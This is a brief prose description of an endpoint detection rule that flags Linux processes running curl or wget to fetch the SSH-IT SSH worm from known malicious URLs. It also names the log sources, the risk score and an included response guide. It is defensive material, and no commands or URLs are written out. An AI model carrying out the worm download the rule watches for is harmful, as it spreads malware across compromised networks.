This rule is designed to detect processes on Linux systems that are attempting to download files linked to a known SSH worm, specifically the SSH-IT autonomous worm. The worm exploits SSH connections, monitoring outgoing sessions in order to facilitate lateral movement within compromised environments. The detection occurs by looking for specific command line arguments in the execution of processes like `curl` or `wget`, which are known to download the worm from identified malicious URLs. The monitored logs include various endpoint event data sources like logs from auditd, CrowdStrike, and Elastic Defend. The rule applies a medium severity risk score of 47, alerting security teams when this behavior is detected. An investigation and response guide is included to handle alerts effectively, advising on potential confirmation steps and remediation actions to mitigate the risk of infection.